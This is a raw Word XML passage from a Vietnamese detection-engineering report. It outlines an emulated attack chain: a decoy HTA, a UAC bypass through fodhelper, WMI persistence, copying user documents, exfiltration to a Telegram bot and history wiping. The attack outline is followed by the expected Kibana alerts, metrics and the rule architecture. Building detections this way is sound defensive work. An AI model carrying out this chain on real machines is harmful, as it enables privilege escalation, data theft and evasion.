    <w:p w14:paraId="6023D5C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Chay tren Windows 10 VM voi user binh thuong (non-admin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CD9294"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Yeu cau: setup.bat, payload.ps1, setup.hta trong cung folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7D1CB2"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60C2A5D7"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Buoc 1: Chay setup.bat (Initial Access simulation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2661066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.\setup.bat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733F09A2"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-&gt; Mo setup.hta (decoy UI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54618DD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-&gt; Tao r.vbs proxy -&gt; chay payload.ps1 hidden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8BC3BB"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-&gt; UAC bypass (ms-settings + fodhelper) -&gt; Admin context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E0A71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-&gt; payload.ps1 ghi svhw.ps1 + cai WMI subscription</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0677D6A2"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-&gt; Xoa registry + r.vbs (cleanup phase 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E71C93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2E400317"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Buoc 2: Doi ~5 giay cho payload.ps1 hoan thanh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C35C39"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Start-Sleep -Seconds 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B5F2D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4432E14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Buoc 3: Trigger WMI Consumer bang notepad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFA18B8"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Start-Process notepad.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B932B34"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-&gt; WMI Consumer fire (within 5s sau khi notepad mo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27ED342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-&gt; svhw.ps1 chay duoi SYSTEM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F6498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 Discovery: arp, Get-WmiObject, Get-NetIPAddress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706EC07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 Collection: Copy-Item Desktop/Documents -&gt; wdmp\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D97C1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 Archive: Compress-Archive -&gt; wdmp.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2979DA9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 Exfil: curl.exe -&gt; Telegram Bot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C4A09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 Cleanup: rd /S /Q wdmp\ + del wdmp.zip + Clear-Content PS history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C517562"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2C10F0B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 KET QUA KY VONG ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F06F1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Rules fire theo thu tu (trong Kibana Security &gt; Alerts):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E24C19"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8E424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~T+0s   S1 (Medium)   wscript.exe proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3290BC6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~T+1s   S2 (Medium)   powershell.exe hidden flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7597F6B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~T+2s   C1 (High)     UAC Bypass sequence confirmed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E0684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~T+5s   C2 (Critical) WMI Persistence chain 19-&gt;20-&gt;21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790E373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~T+15s  S3 (High)     WmiPrvSE spawns PowerShell (SYSTEM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31688894"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~T+16s  C3 (High)     WMI Consumer Activated + Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1773F53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~T+20s  C4 (Critical) Collection-&gt;Archive-&gt;Exfil chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5693776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~T+20s  S4 (Critical) SYSTEM PS outbound HTTPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72579EC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~T+22s  C5 (High)     Exfil-&gt;Cleanup sequence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BA27AC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D90A3AF" w14:textId="2E6311CD" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Tong: </w:t>
      </w:r>
      <w:r w:rsidR="00A863A4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> rules fire, 100% detection coverage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E4653E" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="250CBEE3" w14:textId="4C5AAF25" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A863A4">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.3 Metrics Detection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426"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B01B4A" w14:paraId="574D67CB" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600"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7503C940" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000"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2D4CA4B2" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Giá trị</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4426"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705711A9" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ghi chú</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="3B01638C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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F93CA0F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>True Positive Rate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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3BB9031" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>100%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="44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D979378" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tất cả 7 phases đều có alert tương ứng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="004AC524" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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F54BC90" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>False Positive Rate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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0D2BDD3" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>~0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="442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FC91581" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SYSTEM + behavioral invariants loại bỏ FP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="030A94CC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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F79B04C" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Time to Detect (TTD)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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A6D32A0" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>~1-2 phút</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="44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A3BCBEA" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Từ khi setup.bat chạy đến C1, C2 fire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="22E55979" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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7FAFFD8" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Alerts per attack chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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0335E1FC" w14:textId="290A23AF" w:rsidR="00B01B4A" w:rsidRDefault="00A863A4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10 alerts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="442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52B22DD" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Mỗi alert = 1 phase đã xác nhận</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="220AC222" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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FC05FBE" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MITRE Techniques Detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="200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0225D8CA" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="442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00FA6BEB" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1566.002, T1204, T1059.005, T1548.002, T1546.003, T1082, T1016, T1005, T1560.001, T1041, T1070.004</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="6FAC7804" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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1C65FD3" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Total MITRE Tactics Covered</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="200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256E14F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="442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A0E3FA5" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Initial Access, Execution, PrivEsc, Persistence, Discovery, Collection, Exfiltration, Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F60AED8" w14:textId="77777777" w:rsidR="006D2C1A" w:rsidRDefault="006D2C1A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="650DA180" w14:textId="77777777" w:rsidR="006D2C1A" w:rsidRDefault="006D2C1A" w:rsidP="006D2C1A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="006D2C1A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C0FE59F" wp14:editId="5207BC1E">
            <wp:extent cx="6120130" cy="2000250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="158739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98227" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="2000250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="006D2C1A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006D2C1A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3071F571" wp14:editId="0638DC9C">
            <wp:extent cx="6120130" cy="1734820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="41603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32155" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="1734820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46852D29" w14:textId="2F4A4DEB" w:rsidR="00B01B4A" w:rsidRDefault="006D2C1A" w:rsidP="006D2C1A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 26: </w:t>
      </w:r>
      <w:r w:rsidRPr="002F74EF">
        <w:t>Timeline view trong Kibana SIEM hiển thị tất cả 10 alerts theo thứ tự thời gian trong một attack chain]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39307624" w14:textId="77777777" w:rsidR="006D2C1A" w:rsidRDefault="006D2C1A" w:rsidP="006D2C1A"/>
    <w:p w14:paraId="5B3E16ED" w14:textId="6F71EE8E" w:rsidR="006D2C1A" w:rsidRDefault="006D2C1A" w:rsidP="006D2C1A">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D2C1A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AE0402D" wp14:editId="518A18C4">
            <wp:extent cx="6120130" cy="3838575"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="59892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24945" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="3838575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="006D2C1A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006D2C1A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00D9B374" wp14:editId="3F331091">
            <wp:extent cx="6120130" cy="3178810"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="11075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4004" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="3178810"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A95AD5D" w14:textId="38056501" w:rsidR="006D2C1A" w:rsidRDefault="006D2C1A" w:rsidP="006D2C1A">
      <w:r w:rsidRPr="006D2C1A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4200B284" wp14:editId="15C830B2">
            <wp:extent cx="6120130" cy="2969895"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="192643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38136" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="2969895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CA74E8" w14:textId="7286B614" w:rsidR="006D2C1A" w:rsidRDefault="006D2C1A" w:rsidP="006D2C1A">
      <w:r w:rsidRPr="006D2C1A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3503FF7F" wp14:editId="20ED15F0">
            <wp:extent cx="5537200" cy="2711148"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="51297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76567" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5545234" cy="2715081"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4F9C34" w14:textId="77777777" w:rsidR="006D2C1A" w:rsidRDefault="006D2C1A" w:rsidP="006D2C1A">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="006D2C1A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76A5E460" wp14:editId="6CB226CD">
            <wp:extent cx="5999480" cy="3035300"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="44768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82845" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5999480" cy="3035300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AC06AA" w14:textId="2EB99302" w:rsidR="00B01B4A" w:rsidRDefault="006D2C1A" w:rsidP="006D2C1A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 27: </w:t>
      </w:r>
      <w:r w:rsidRPr="00206542">
        <w:t>Telegram Bot nhận notification từ C1-C5 với host name và timestamp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A884A4D" w14:textId="0507ADF2" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="AAAAAA"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>XII. KIẾN TRÚC HỆ THỐNG DETECTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69973BB2" w14:textId="6FF38DA5" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A863A4">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.1 Mô Hình Phòng Thủ Đa Lớp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D9FFB1" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Hệ thống detection được tổ chức theo mô hình phòng thủ đa lớp, trong đó mỗi lớp có độ chính xác và phạm vi phủ khác nhau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B21EE11" w14:textId="2ED87D18" w:rsidR="00B01B4A" w:rsidRDefault="00A863A4">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6FB6EE98" w14:textId="18CC9484"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Lớp 3 — Correlation Rules (Phase Sequences)                   </w:t>
      </w:r>
      <w:r w:rsidR="00AE5057">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>║</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EC370D" w14:textId="386BEC7A"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[C1] UAC Bypass  [C2] WMI Persistence  [C3] WMI Activation  </w:t>
      </w:r>
      <w:r w:rsidR="00AE5057">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ║</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C08D50D" w14:textId="23860FA3"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[C4] Exfil Chain [C5] Exfil+Cleanup                          </w:t>
      </w:r>
      <w:r w:rsidR="00AE5057">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> ║</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E219B5" w14:textId="0A22EEAE"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Multi-event sequences — FP thấp — Semantic rõ ràng           </w:t>
      </w:r>
      <w:r w:rsidR="00AE5057">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> ║</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12010142"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9A05E9" w14:textId="0D5EDF9C"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Lớp 2 — Signal Rules (Single Events)                         </w:t>
      </w:r>
